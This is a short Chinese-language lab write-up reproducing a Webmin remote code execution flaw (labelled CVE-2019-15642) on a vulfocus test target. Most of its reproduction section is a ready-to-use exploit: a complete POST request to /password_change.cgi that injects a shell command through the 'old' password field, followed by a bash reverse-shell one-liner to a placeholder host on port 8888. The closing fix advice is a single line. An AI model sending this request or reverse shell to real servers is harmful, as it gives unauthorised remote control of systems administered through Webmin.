webmin 远程代码执行 （CVE-2019-15642）

所有文章，仅供安全研究与学习之用，后果自负!

webmin 远程代码执行 （CVE-2019-15642）

0x01 漏洞描述

Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。 账户密码：root/root

漏洞端口10000

漏洞url

/password_change.cgi

0x02 影响范围

Webmin<=1.9.20

0x03 漏洞复现

(1)https访问靶场

后台界面如下

（2）
然后抓包构造以下数据，当我们的用户名存在时会直接返回修改密码失败，原密码错误，不会执行后面的命令。

这种思路其实可以也用到逻辑测试上，当用户存在时不存在漏洞，但是当用户不存在时确可以执行命令。
poc
在请求体 测试参数中只要确保存在user、old、new1、new2这四个参数就可执行命令

POST /password_change.cgi HTTP/1.1
Host: vulfocus.fofa.so:48294
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://vulfocus.fofa.so:48294/
Connection: close
Referer: https://vulfocus.fofa.so:48294/
Cookie: redirect=1; testing=1;sid=x;sessiontest=1
Upgrade-Insecure-Requests: 1

user=root111&pam=&expired=2&old=test|ls&new1=test2&new2=test2

直接burp修改 host origin referer

还有 右上角

放包 执行ls命令成功

反弹shell

bash -c "bash -i >& /dev/tcp/x.x.x.x/8888 0>&1"

需要url编码才能成功

bp发包 响应包 没有 但是反弹shell成功

0x04 漏洞修复

升级至最新版本